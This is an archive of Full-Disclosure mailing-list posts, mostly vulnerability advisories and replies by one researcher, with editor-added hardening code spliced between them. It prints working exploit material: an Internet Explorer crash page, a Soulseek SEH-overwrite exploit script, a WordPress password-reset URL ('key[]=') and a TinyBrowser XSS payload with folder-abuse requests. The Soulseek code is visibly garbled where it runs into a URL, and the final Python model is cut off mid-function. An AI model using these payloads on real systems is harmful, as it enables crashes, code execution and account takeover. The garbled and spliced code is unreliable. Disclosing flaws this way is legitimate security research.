Re: [Full-disclosure] DoS vulnerability in Internet Explorer 6, 7, 8 (access violation)

2013-11-19 Thread laurent gaffie
I can't see any differences from the original advisory apart from the
tag with your website address.
What's the point of posting this on FD...?


2013/11/19 MustLive 

> Hello list!
>
> I want to warn you about a Denial of Service vulnerability in Internet
> Explorer. This is an access violation.
>
> This exploit is based on an exploit by Asesino04 for IE7. As I've tested, it
> also works in IE6 and IE8.
>
> -
> Affected products:
> -
>
> Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7
> (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous
> versions of these browsers. IE 9, 10 and 11 were not tested, but potentially
> they can be vulnerable.
>
> --
> Details:
> --
>
> Denial of Service (WASC-10):
>
> The browser crashes on access by id to an element of the web page via the
> document.getElementById method. In IE 6 and 7 the browser crashes, but in
> IE8 the tab automatically restarts after an error message (this
> functionality appeared in IE8).
>
> PoC / Exploit:
>
> <html>
> <head>
> <title>Internet Explorer 6, 7 & 8 DoS Exploit. http://websecurity.com.ua</title>
> </head>
> <body>
> <table>
> <!-- the markup around the script was stripped by the list archive; the col
>      element is reconstructed from the script's obj_col / width / span usage -->
> <col id="132">
> </table>
> <script type="text/javascript">
> function over_trigger() {
>     var obj_col = document.getElementById("132");
>     obj_col.width = 42765; // oversized width on the col element
>     obj_col.span = 1000;
> }
> setTimeout("over_trigger()", 1);
> </script>
> </body>
> </html>
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

[Full-disclosure] Soulseek 157 NS < 13e & 156.* Remote Direct Peer Search Code Execution

2009-07-02 Thread laurent gaffie
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/
- Severity: critical
=

I. VULNERABILITY
-
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"

III. DESCRIPTION
-
The Soulseek client allows direct peer file search, allowing a user to find the
files he wants directly on the peer computer.
Unfortunately this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-
This proof of concept will target a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" # replace with the peer's port as an integer (socket.connect needs an int); you can find out how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
 s.connect((ip,port))
except:
 print "Can\'t connect to peer!\n"
 sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack('http://slsknet.org/download.html)

VIII. REFERENCES
-
http://www.slsknet.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-
july 02, 2009

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES

The Soulseek team has patched this bug a month ago; a distributed message urging
users to upgrade their Soulseek client has been sent for a month now, and not
many users still use vulnerable Soulseek versions.
@ the one who likes to rip bugs and make an exploit "universal" for fame:
just make sure it's at least universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU   :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html

Re: [Full-disclosure] A brief message on the topic of Anti-Sec

2009-07-20 Thread laurent gaffie
"Ok? Well, then have a nice day and
don't hold your breath waiting for the OpenSSH 0day. 0pen0wn.c
(http://www.nopaste.com/p/aDTdT5s1C) was it!"

ya the hex encoded irc bot & rm -rf ? :)



2009/7/20 

> Hi,
>
> My name is DeadlyData. I enjoy long walks on the beach, getting
> pizzas delivered to my house when my d0x were dropped, and having
> anal sex with my buddy Sean/TD Debug. My 1337 hack group The
> Defaced (thedefaced.org) has been making threats and being homo-
> erotic on F-D. I'm sure you've seen the email from
> anti.sec.movem...@gmail.com that said "Please check out our website
> at: http://romeo.copyandpaste.info/"; Well, that is RoMeO's website
> (a TheDefaced admin!) dedicated to posing as a 1337 blackhat haqr.
> He's got cool things on there like portions of phrack zines, anti-
> sec ownages (that were done by the other anti-sec factions. You
> think we can hack? GOOD JOKE!!!), some zines from the olden days,
> and a speech by our buddy strayfe/n3w7yp3 (we love his dick, but we
> don't think he likes us ;( We lub you strayfe!). I just wanted to
> let you all know that our group has no 0days. Don't waste your time
> reading anti.sec.movem...@gmail.com's bullshit. Just worry about
> the other anti-sec factions. Ok? Well, then have a nice day and
> don't hold your breath waiting for the OpenSSH 0day. 0pen0wn.c
> (http://www.nopaste.com/p/aDTdT5s1C) was it!
>
> Sincerely,
>  DeadlyData
>
>

Re: [Full-disclosure] TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities

2009-07-28 Thread laurent gaffie
***this also affects any joomla! >1.5.*  ***


2009/7/28 YGN Ethical Hacker Group (http://yehg.net) 

>
> ==
>  TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple
> Vulnerabilities
>
> ==
>
> Discovered by
> Aung Khant, YGN Ethical Hacker Group, Myanmar
> http://yehg.net/ ~ believe in full disclosure
>
> Advisory URL:
>
> http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
> (http://yehg.net/lab/#advisories)
> Date published: 2009-07-27
> Severity: High
> Vulnerability Class: Abuse of Functionality
> Affected Products:
> - TinyMCE editor with TinyBrowser plugin
> - Any web sites/web applications that use TinyMCE editor with TinyBrowser
> plugin
>
>
> Author: Bryn Jones (http://www.lunarvis.com)
> Author Contacted: Yes
> Reply: No reply
>
>
> Product Overview
> 
>
> TinyBrowser is a plugin of the TinyMCE JavaScript editor that acts as a
> file browser to view, upload, delete, rename files and folders on the
> web server. TinyMCE is supposedly in wider use than its rival fckeditor
> due to faster loading and a slightly cleaner interface. TinyMCE is
> mostly found in open-source web applications, used as a textarea replacement
> HTML editor for allowing users to do text formatting with ease.
>
> Vulnerabilities
> ==
>
> #1. Default Insecure Configurations
>
> Configuration settings shipped with tinybrowser are relatively insecure by
> default. They allow attackers to view, upload, delete, rename files and
> folders under its predefined upload directory.
>
> Casual web developers or users might just upload the TinyMCE browser
> without doing any configuration, or they might do it later.
> Meanwhile, if an attacker luckily finds the tinybrowser directory, which is
> by default jscripts/tiny_mce/plugins/tinybrowser, he can do harm or abuse
> because of the insecure default configuration.
>
> This was once a vulnerability of fckeditor (http://fckeditor.net), which
> has fixed its hole - if you run fckeditor's file upload page the first
> time, you'll see "This connector is disabled. Please check the ".
> Tinybrowser should imitate this.
>
>
> #2. Arbitrary Folder Creation
>
> Requesting the url [PATH]/tinybrowser.php?type=image&folder=hacked will
> create a folder named "hacked" in /useruploads/images/ directory if that
> folder does not exist.
>
>
> #3. Arbitrary File Hosting
>
> File: config_tinybrowser.php
> Code:
> // File upload size limit (0 is unlimited)
> $tinybrowser['maxsize']['image'] = 0; // Image file maximum size
> $tinybrowser['maxsize']['media'] = 0; // Media file maximum size
> $tinybrowser['maxsize']['file']  = 0; // Other file maximum size
> $tinybrowser['prohibited'] =
> array('php','php3','php4','php5','phtml','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg','cgi',
> 'sh', 'py','asa','asax','config','com','inc');
> // Prohibited file extensions
>
> The max allowable upload is not restricted, so it will depend only on the web
> server's default setting or PHP timeout value. There are not many restricted
> file types. Here's a way to abuse:
> - Create a hidden directory by requesting
> [PATH]/upload.php?type=file&folder=.hostmyfiles
> - Then go to /upload.php?type=file&folder=.hostmyfiles
> - Host your sound, movie, pictures, zipped archives or even your sample
> HTML web sites for FREE!
>
> An evil trick to create seemingly interesting folder such as secret and
> host a
> browser-exploit html page that triggers drive-by-download trojan.
> When web master browses that folder and clicks the exploit file, then he
> gets owned.
>
> #4. Cross-site Scripting
>
> Most GET/POST variables are not sanitized.
>
> File: upload.php
> Code:
> $goodqty = (isset($_GET['goodfiles']) ? $_GET['goodfiles'] : 0);
> $badqty = (isset($_GET['badfiles']) ? $_GET['badfiles'] : 0);
> $dupqty = (isset($_GET['dupfiles']) ? $_GET['dupfiles'] : 0);
>
> Exploit: upload.php?badfiles=1">alert(/XSS/)
>
> #5. Cross-site Request Forgeries
>
> All major actions such as create, delete, rename files/folders are GET/POST
> XSRF-able.
>
>
> #
>
>
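Hardened handling for the five items in the quoted advisory, as an added example that is not TinyBrowser's code and not part of the thread; every function name, the allow-list contents and the constructed inputs are assumptions made for this demo.

```php
<?php
// Added example, not TinyBrowser's code: hardened handling for the parameters the
// advisory above walks through (#2/#3 folder creation and hosting, #3 size and
// extension limits, #4 the numeric counters, #5 state-changing actions). Function
// names, allow-list contents and the constructed inputs are assumptions for this demo.

// #2/#3: "folder" must be a single plain segment that already exists under the upload
// root. A leading dot (".hostmyfiles"), slashes and ".." fail the pattern, and
// realpath() confirms the result stays inside the root, so a request cannot create
// or reach folders on its own.
function tb_resolve_folder($uploadRoot, $folder)
{
    if (!is_string($folder) || !preg_match('/^[A-Za-z0-9_-]{1,64}$/', $folder)) {
        return null;
    }
    $root = realpath($uploadRoot);
    $path = realpath($uploadRoot . DIRECTORY_SEPARATOR . $folder);
    if ($root === false || $path === false || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// #3: an allow-list per upload type replaces the extension deny-list, and every type
// gets a finite byte limit instead of 0 (unlimited). Values are demo choices.
$tb_allowed = array(
    'image' => array('jpg', 'jpeg', 'png', 'gif'),
    'media' => array('mp3', 'mp4', 'ogg'),
    'file'  => array('pdf', 'zip', 'txt'),
);
$tb_maxsize = array('image' => 2097152, 'media' => 20971520, 'file' => 5242880);

function tb_upload_allowed($type, $filename, $size)
{
    global $tb_allowed, $tb_maxsize;
    if (!isset($tb_allowed[$type])) {
        return false;
    }
    // exactly one extension, so double extensions such as name.php.jpg never pass
    if (!preg_match('/^[A-Za-z0-9_-]{1,100}\.([A-Za-z0-9]{1,5})$/', $filename, $m)) {
        return false;
    }
    if (!in_array(strtolower($m[1]), $tb_allowed[$type], true)) {
        return false;
    }
    return $size > 0 && $size <= $tb_maxsize[$type];
}

// #4: goodfiles/badfiles/dupfiles are counts, so cast them to int before use, and
// HTML-encode anything that still has to reach the page body.
function tb_count_param($name)
{
    return (isset($_GET[$name]) && is_string($_GET[$name])) ? (int) $_GET[$name] : 0;
}

function tb_html($text)
{
    return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
}

// #5: create/delete/rename only proceed when the request carries the session's token,
// which a cross-site form or link does not know; hash_equals() avoids a timing leak.
function tb_csrf_ok($sessionToken, $requestToken)
{
    return is_string($sessionToken) && is_string($requestToken)
        && $sessionToken !== '' && hash_equals($sessionToken, $requestToken);
}

// Constructed requests mirroring the advisory, run through the checks above.
$root = sys_get_temp_dir();
var_dump(tb_resolve_folder($root, '.hostmyfiles'));   // hidden folder name from #3
var_dump(tb_resolve_folder($root, '..'));             // traversal attempt
$dir = $root . DIRECTORY_SEPARATOR . 'tb_demo_' . getmypid();
@mkdir($dir);
var_dump(tb_resolve_folder($root, basename($dir)));   // an existing plain folder
@rmdir($dir);
var_dump(tb_upload_allowed('file', 'shell.php', 10));
var_dump(tb_upload_allowed('file', 'report.pdf', 10));
$_GET['badfiles'] = '1abc';                           // non-numeric tail, as in the XSS item
var_dump(tb_count_param('badfiles'));
echo tb_html($_GET['badfiles']), "\n";
$token = bin2hex(random_bytes(16));
var_dump(tb_csrf_ok($token, $token), tb_csrf_ok($token, 'guess'));
```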

Re: [Full-disclosure] AntiSec Lamers Exposed

2009-07-28 Thread laurent gaffie
Hi there,

First of all I don't care about antisec, antisex, anti-sec, n3td3v trolls,
and anti-se*
But I'll be speaking only about FACTS:

You have to prove by A+B that this man {whoever he is} was really behind
his computer while this crime was done, and that his computer wasn't
compromised by someone, and this is a real pain in the ass to prove. That's
why so many cyber-criminals can escape so easily from justice.

Your only chance, in this case, would be to have a scared person
confessing his crime under pressure; other than that, good luck, you need more
than a whois and some logs.

Regards





2009/7/28 antisec exposed 

> Hmm, he thinks he is untouchable because he can't think of any hackers in
> Saudi being arrested. Also he thinks his IP doesn't matter cause he may have
> used a proxy in his hacking. Well I suppose taking credit for it over and
> over and over like it is your life's achievement doesn't matter, eh?
>
> Let's face it antisec, you are LAME. No one gives a shit about your cause.
> The only noteworthy hack you have done is imageshack, which will also be your
> undoing. Let's do a lil recap of your so great achievements.
>
> -astalavista.com - lame spammy site with dead forum, who gives a shit? And
> secondly who even took them seriously in the first place? No one. That's
> who.
> -ssanz - Who the fuck is ssanz? Some kid running a server management
> company from his laptop? Who the hell even heard of him, much less took his
> site and services seriously? Wow, you sure have changed the world with this
> hack, how dare some 15 year old kid advertise secure server management. You
> really taught the rest of us a lesson.
> -secureservertech - jesus fucking christ, has anyone even seen this site? A
> shitty no name hosting company with a shitty template monster template
> offering secure web hosting. You got to be kidding me, yet another company
> no one has heard of, much less takes anything they say seriously. What another
> great achievement there, you really are changing things, Gee the entire
> internet depended on them for secure web hosting. /sarcasm
> -infosec.org.uk - yet another no name security site/security expert no one
> gives a shit about.
>
> All of your fine select targets show you are just a bunch of kiddies who
> happened to get a few good exploits which you no doubt did not write. If
> you really wanted to "teach us all a lesson" and punish anyone who dares
> advocate security why not go after someone we have all actually heard of?
> like securityfocus, symantec, etc? I'm sure everyone knows the answer - you
> just simply aren't able to.
>
> Kids like you pop up every few years and get swatted down like the lil flies
> you are. Within a month I guarantee you and your hrdev buddies will be
> arrested. Keep on thinking you are untouchable, you are not.
>
>
>

Re: [Full-disclosure] AntiSec Lamers Exposed

2009-07-28 Thread laurent gaffie
"> First of all I don't care about antisec, antisex, anti-sec, n3td3v trolls,
> and anti-se*"

What don't you understand in this?
I don't freakin' care about you, you're a waste of time.




2009/7/28 andrew.wallace 

> Hi there,
>
> Stop bringing my name into this or face legal action, understood?
>
>
> http://news.cnet.com/8618-27080_3-10295688.html?communityId=2134&targetCommunityId=2134&blogId=245&messageId=8219055&tag=mncol;tback
>
> Thanks for understanding,
>
> Andrew
>
> On Wed, Jul 29, 2009 at 12:06 AM, laurent
> gaffie wrote:

[Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
=
- Release date: August 10th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium
=

I. VULNERABILITY
-
WordPress <= 2.8.3 Remote admin reset password

II. BACKGROUND
-
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards, and usability.
WordPress is both free and priceless at the same time.
More simply, WordPress is what you use when you want to work with your
blogging software, not fight it.

III. DESCRIPTION
-
The way WordPress handles a password reset looks like this:
You submit your email address or username via this form
/wp-login.php?action=lostpassword ;
WordPress sends you a reset confirmation like this via email:

"
Someone has asked to reset the password for the following site and username.
http://DOMAIN_NAME.TLD/wordpress
Username: admin
To reset your password visit the following address, otherwise just ignore
this email and nothing will happen

http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
"

You click on the link, and then WordPress resets your admin password and
sends you another email with your new credentials.

Let's see how it works:


wp-login.php:
...[snip]
line 186:
function reset_password($key) {
    global $wpdb;

    $key = preg_replace('/[^a-z0-9]/i', '', $key);

    if ( empty( $key ) )
        return new WP_Error('invalid_key', __('Invalid key'));

    $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
    if ( empty( $user ) )
        return new WP_Error('invalid_key', __('Invalid key'));
...[snip]
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();

if ( isset($_GET['key']) )
    $action = 'resetpass';

// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
    $action = 'login';
...[snip]

line 370:

    break;

case 'resetpass' :
case 'rp' :
    $errors = reset_password($_GET['key']);

    if ( ! is_wp_error($errors) ) {
        wp_redirect('wp-login.php?checkemail=newpass');
        exit();
    }

    wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
    exit();

    break;
...[snip]...

You can abuse the password reset function, bypass the first step and
then reset the admin password by submitting an array to the $key variable.


IV. PROOF OF CONCEPT
-
A web browser is sufficient to reproduce this Proof of concept:
http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
The password will be reset without any confirmation.

V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3

VI. SYSTEMS AFFECTED
-
All

VII. SOLUTION
-
No patch available for the moment.

VIII. REFERENCES
-
http://www.wordpress.org

IX. CREDITS
-
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
I'd like to shoot some greetz to securityreason.com for their great research
on PHP, as well as for this under-estimated vulnerability discovered by Maksymilian
Arciemowicz :
http://securityreason.com/achievement_securityalert/38

X. REVISION HISTORY
-
August 10th, 2009: Initial release

XI. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
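The type confusion behind the key[]= PoC, as an added example that is not part of the advisory and not WordPress code: the user table, prepare_model() and lookup_by_key() are constructed stand-ins for the pieces the quoted excerpt calls, the reset functions mirror its checks, and the hardened version is this editor's suggestion rather than the project's fix.

```php
<?php
// Added example, not WordPress code: a stand-alone model of the reset_password()
// excerpt above, showing why key[]= passes the sanitizer and reaches the lookup, next
// to a hardened version of the same check. The user table, prepare_model() and
// lookup_by_key() are constructed for this demo and are not WordPress' own.

// Constructed user table: a user with no pending reset has an empty activation key.
$users = array(
    array('ID' => 1, 'user_login' => 'admin', 'user_activation_key' => ''),
    array('ID' => 2, 'user_login' => 'bob',   'user_activation_key' => 'o7naCKN3OoeU2KJMMsag'),
);

// Model of the argument handling in $wpdb->prepare() of that era: an array in the
// first argument slot is used as the whole vsprintf argument list, so array('')
// from key[]= is bound as the single string ''.
function prepare_model($query, $arg)
{
    $args = is_array($arg) ? array_values($arg) : array($arg);
    $args = array_map(function ($v) { return addslashes((string) $v); }, $args);
    return vsprintf(str_replace('%s', "'%s'", $query), $args);
}

// Model of the row lookup: compare the bound literal against each user's key.
function lookup_by_key($users, $sql)
{
    if (!preg_match("/user_activation_key = '(.*)'$/", $sql, $m)) {
        return null;
    }
    foreach ($users as $user) {
        if ($user['user_activation_key'] === stripslashes($m[1])) {
            return $user;
        }
    }
    return null;
}

// Same checks as the quoted wp-login.php code: preg_replace() on an array returns an
// array, empty() is false for a non-empty array, and the query ends up binding ''.
function reset_password_vulnerable($users, $key)
{
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if (empty($key)) {
        return 'invalid_key';
    }
    $user = lookup_by_key($users, prepare_model("SELECT * FROM users WHERE user_activation_key = %s", $key));
    if (empty($user)) {
        return 'invalid_key';
    }
    return 'reset:' . $user['user_login'];
}

// Hardened: reject anything that is not a non-empty string before the lookup, and
// never treat a row whose stored key is empty as a pending reset.
function reset_password_hardened($users, $key)
{
    if (!is_string($key)) {
        return 'invalid_key';
    }
    $key = preg_replace('/[^a-z0-9]/i', '', $key);
    if ($key === '') {
        return 'invalid_key';
    }
    $user = lookup_by_key($users, prepare_model("SELECT * FROM users WHERE user_activation_key = %s", $key));
    if (empty($user) || $user['user_activation_key'] === '') {
        return 'invalid_key';
    }
    return 'reset:' . $user['user_login'];
}

// The PoC URL's query string, parsed the way PHP fills $_GET: key[]= becomes array('').
parse_str('action=rp&key[]=', $q);
echo reset_password_vulnerable($users, $q['key']), "\n";            // PoC input, old checks
echo reset_password_hardened($users, $q['key']), "\n";              // PoC input, hardened checks
echo reset_password_hardened($users, 'o7naCKN3OoeU2KJMMsag'), "\n"; // the legitimately mailed key
```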

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Errata:

"V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to compromise the admin account
of any wordpress/wordpress-mu <= 2.8.3"

-->

"V. BUSINESS IMPACT
-
An attacker could exploit this vulnerability to reset the admin account of
any wordpress/wordpress-mu <= 2.8.3"


Regards Laurent Gaffié


2009/8/10 laurent gaffie 


Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Hi there,

This wasn't tested on the 2.7* branch.
It has been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as an
Apache 2.2.12 module, on a linux env.


Regards Laurent Gaffié



2009/8/10 Nicolas Valcárcel Scerpella 

> I don't see the issue with wp 2.7.1
>
> On Mon, 10 Aug 2009, laurent gaffie wrote:

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Oh ok.
Then, let's avoid that function.
If it's useless to have a function that validates a reset password before
resetting it, let's just avoid it, smartass.


2009/8/10 Fabio N Sarmento [ Gmail ] 

> There is no risk in this.
> It's just a little flaw, it doesn't break anything or put your admin access
> at risk.
>
> :-P to me, this vulnerability is more "BUZZ" than real deal. LOL
>
>
> 2009/8/10 laurent gaffie 
>
>> Hi there,
>>
>> This wasn't tested on the 2.7* branch.
>> It as been tested on the  2.8.* branch, with php 5.3.0 & php 5.2.9 as an
>> Apache 2.2.12 module, on a linux env.
>>
>>
>> Regards Laurent Gaffié
>>
>>
>>
>> 2009/8/10 Nicolas Valcárcel Scerpella 
>>
>>> I don't see the issue with wp 2.7.1
>>>
>>> On Mon, 10 Aug 2009, laurent gaffie wrote:
>>>
>>> > Errata:
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -
>>> > An attacker could exploit this vulnerability to compromise the admin
>>> account
>>> > of any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> > -->
>>> >
>>> > "V. BUSINESS IMPACT
>>> > -
>>> > An attacker could exploit this vulnerability to reset the admin account
>>> of
>>> > any wordpress/wordpress-mu <= 2.8.3"
>>> >
>>> >
>>> > Regards Laurent Gaffié
>>> >
>>> >
>>> > 2009/8/10 laurent gaffie 
>>> >
>>> > > =
>>> > > - Release date: August 10th, 2009
>>> > > - Discovered by: Laurent Gaffié
>>> > > - Severity: Medium
>>> > > =
>>> > >
>>> > > I. VULNERABILITY
>>> > > -
>>> > > WordPress <= 2.8.3 Remote admin reset password
>>> > >
>>> > > II. BACKGROUND
>>> > > -
>>> > > WordPress is a state-of-the-art publishing platform with a focus on
>>> > > aesthetics, web standards, and usability.
>>> > > WordPress is both free and priceless at the same time.
>>> > > More simply, WordPress is what you use when you want to work with
>>> your
>>> > > blogging software, not fight it.
>>> > >
>>> > > III. DESCRIPTION
>>> > > -
>>> > > The way WordPress handles a password reset looks like this:
>>> > > You submit your email address or username via this form
>>> > > /wp-login.php?action=lostpassword ;
>>> > > WordPress sends you a reset confirmation like this via email:
>>> > >
>>> > > "
>>> > > Someone has asked to reset the password for the following site and
>>> > > username.
>>> > > http://DOMAIN_NAME.TLD/wordpress
>>> > > Username: admin
>>> > > To reset your password visit the following address, otherwise just
>>> ignore
>>> > > this email and nothing will happen
>>> > >
>>> > >
>>> > >
>>> http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
>>> > > "
>>> > >
>>> > > You click on the link, and then WordPress resets your admin password,
>>> > > and sends you over another email with your new credentials.
>>> > >
>>> > > Let's see how it works:
>>> > >
>>> > >
>>> > > wp-login.php:
>>> > > ...[snip]
>>> > > line 186:
>>> > > function reset_password($key) {
>>> > > global $wpdb;
>>> > >
>>> > > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>>> > >
>>> > > if ( empty( $key ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>> > >
>>> > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users
>>> WHERE
>>> > > user_activation_key = %s", $key));
>>> > > if ( empty( $user ) )
>>> > > return new WP_Error('invalid_key', __('Invalid key'));
>>>

Re: [Full-disclosure] WordPress <= 2.8.3 Remote admin reset password

2009-08-10 Thread laurent gaffie
Well, I don't think so, that's why I published this.
It's very limited.
It's true, someone can make a loop script and prevent any possibility of logging
back on your WordPress blog, but you can also avoid that functionality
easily, you just need to comment out 1 line.
Anyway, a patch should come out soon.

Regards Laurent Gaffié




2009/8/10 ehmo 

> Very nice Laurent. That will hurt many ppl
>
> laurent wrote,
> > =
> > - Release date: August 10th, 2009
> > - Discovered by: Laurent Gaffié
> > - Severity: Medium
> > =
>
> > I. VULNERABILITY
> > -
> > WordPress <= 2.8.3 Remote admin reset password
>
> > II. BACKGROUND
> > -
> > WordPress is a state-of-the-art publishing platform with a focus on
> > aesthetics, web standards, and usability.
> > WordPress is both free and priceless at the same time.
> > More simply, WordPress is what you use when you want to work with your
> > blogging software, not fight it.
>
> > III. DESCRIPTION
> > -
> > The way WordPress handles a password reset looks like this:
> > You submit your email address or username via this form
> > /wp-login.php?action=lostpassword ;
> > WordPress sends you a reset confirmation like this via email:
>
> > "
> > Someone has asked to reset the password for the following site and
> > username.
> > http://DOMAIN_NAME.TLD/wordpress
> > Username: admin
> > To reset your password visit the following address, otherwise just ignore
> > this email and nothing will happen
>
> >
> > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag
> > "
> >
> > You click on the link, and then WordPress resets your admin password, and
> > sends you over another email with your new credentials.
>
> > Let's see how it works:
>
>
> > wp-login.php:
> > ...[snip]
> > line 186:
> > function reset_password($key) {
> > global $wpdb;
>
> > $key = preg_replace('/[^a-z0-9]/i', '', $key);
>
> > if ( empty( $key ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
>
> > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE
> > user_activation_key = %s", $key));
> > if ( empty( $user ) )
> > return new WP_Error('invalid_key', __('Invalid key'));
> > ...[snip]
> > line 276:
> > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
> > $errors = new WP_Error();
>
> > if ( isset($_GET['key']) )
> > $action = 'resetpass';
>
> > // validate action so as to default to the login screen
> > if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword',
> > 'resetpass', 'rp', 'register', 'login')) && false ===
> > has_filter('login_form_' . $action) )
> > $action = 'login';
> > ...[snip]
>
> > line 370:
>
> > break;
>
> > case 'resetpass' :
> > case 'rp' :
> > $errors = reset_password($_GET['key']);
>
> > if ( ! is_wp_error($errors) ) {
> > wp_redirect('wp-login.php?checkemail=newpass');
> > exit();
> > }
>
> > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
> > exit();
>
> > break;
> > ...[snip ]...
>
> > You can abuse the password reset function, bypass the first step and
> > then reset the admin password by submitting an array to the $key variable.
>
>
> > IV. PROOF OF CONCEPT
> > -
> > A web browser is sufficient to reproduce this proof of concept:
> > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
> > The password will be reset without any confirmation.
>
> > V. BUSINESS IMPACT
> > -
> > An attacker could exploit this vulnerability to compromise the admin
> > account of any wordpress/wordpress-mu <= 2.8.3
>
> > VI. SYSTEMS AFFECTED
> > -
> > All
>
> > VII. SOLUTION
> > -
> > No patch available for the moment.
>
> > VIII. REFERENCES
> > -
> > http://www.wordpress.org
>
> > IX. CREDITS
> > -
> > This vulnerability has been discovered by Laurent Gaffié
> > Laurent.gaffie{remove-this}(at)gmail.com
> > I'd like to shoot some greetz to securityreason.com for their great
> > research on PHP, as for this under-estimated vulnerability discovered by
> > Maksymilian Arciemowicz :
> > http://securityreason.com/achievement_securityalert/38
>
> > X. REVISION HISTORY
> > -
> > August 10th, 2009: Initial release
>
> > XI. LEGAL NOTICES
> > -
> > The information contained within this advisory is supplied "as-is"
> > with no warranties or guarantees of fitness of use or otherwise.
> > I accept no responsibility for any damage caused by the use or
> > misuse of this information.
>
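
The reset_password() control flow quoted in the advisory above, modelled in Python as an added example (it is not WordPress code): the PHP behaviours the bug depends on, preg_replace() mapping over an array, empty() being false for [''] and $wpdb->prepare() unpacking a lone array argument (the prepare() behaviour is assumed from the WP 2.8 source), are emulated by small helpers, and the hardened form sits beside the vulnerable one. USERS and the two KEY_* values are constructed sample data.

```python
import re

# Constructed stand-in for the wp_users rows the advisory's query reads.
# A user who never asked for a reset has an empty user_activation_key.
USERS = [
    {"ID": 1, "user_login": "admin", "user_activation_key": ""},
    {"ID": 2, "user_login": "editor",
     "user_activation_key": "o7naCKN3OoeU2KJMMsag"},
]

# How PHP's $_GET parses the two requests shown in the advisory:
#   ?action=rp&key=o7naCKN3OoeU2KJMMsag -> a string
#   ?action=rp&key[]=                   -> a one-element array ['']
KEY_FROM_EMAIL = "o7naCKN3OoeU2KJMMsag"
KEY_FROM_POC = [""]


def php_preg_strip(key):
    """preg_replace('/[^a-z0-9]/i', '', $key): PHP maps the replacement
    over every element when $key is an array and returns an array."""
    if isinstance(key, list):
        return [re.sub(r"[^a-z0-9]", "", k, flags=re.I) for k in key]
    return re.sub(r"[^a-z0-9]", "", key, flags=re.I)


def php_empty(value):
    """PHP empty(): '' and [] are empty, but the array [''] is not."""
    return value in ("", None, [], 0, "0")


def wpdb_prepare(query, arg):
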